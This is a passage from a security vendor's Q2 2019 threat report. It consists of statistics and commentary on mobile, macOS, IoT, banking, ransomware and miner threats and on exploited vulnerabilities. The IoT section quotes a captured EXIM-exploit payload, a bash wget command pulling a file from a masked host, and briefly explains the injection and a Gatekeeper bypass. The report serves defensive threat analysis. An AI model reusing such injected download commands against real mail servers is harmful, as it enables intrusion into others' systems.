thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAlso an interesting vector for delivering a malicious miner to victims was [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks_\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 | \n2 | Zbot | Trojan.Win32.Zbot | 23.3 | \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 | \n5 | Trickster | Trojan.Win32.Trickster | 5.0 | \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 | \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 | \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 | \n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 | \n10 | Gozi | Trojan.Win32.Gozi | 1.1 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32.PolyRansom | 2.45% | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased \u2013 from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception \u2013 the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>). A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient scanning of incoming packets allows an attacker to implement a use-after-free script and overwrite data in the kernel memory. Note that exploitation of this attack does not require access to a remote account, as it takes place at the authorization stage before the username and password are checked.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 